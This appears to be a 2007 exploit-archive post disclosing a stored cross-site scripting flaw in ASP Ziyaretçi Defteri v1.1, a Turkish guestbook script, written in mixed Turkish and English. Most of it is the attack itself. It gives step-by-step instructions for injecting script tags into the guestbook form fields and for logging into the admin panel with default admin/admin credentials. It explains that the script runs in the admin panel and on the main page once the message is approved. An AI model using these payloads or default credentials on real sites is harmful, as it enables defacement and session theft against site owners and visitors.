Home / exploits aspziy-xss.txt
Posted on 17 July 2007
ASP Ziyaretçi Defteri v1.1 (tr) XSS Vulnerability #Software: ASP Ziyaretçi Defteri v1.1 (tr) #download: http://www.aspindir.com/goster/4882 #demo: http://www.hiddenchest.com/kodlarim/ziyaret/ #Found By: GeFORC3 ( G3 ) #Exploit: 1-http://www.example.com/ziyaret/mesaj_formu.asp Isim: <script>alert("G3");</script> E-posta: <script>alert("G3");</script> Mesajiniz: <script>alert("G3");</script> Press to "Gönder"(send) button. 2- Yönetici paneli (admin panel): http://www.example.com/ziyaret/default.asp (default user:admin pass:admin) press "gir" button. http://www.example.com/default.asp?islem=login --> running xss code This xss works on ASP Ziyaretçi Defteri v1.1 (tr) script's Yönetici Paneli (admin panel) if eðer admin mesajý onaylarsa (active ederse) xss code çalýþýr guestbook's main page (ziyaretçi defterinin ana sayfasýnda) if admin checked your message (xss code) xss code running ASP Ziyaretçi Defteri v1.1's (guestbook's) main page ( http://example.com/ziyaret/ziyaretci_mesajlari.asp) WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com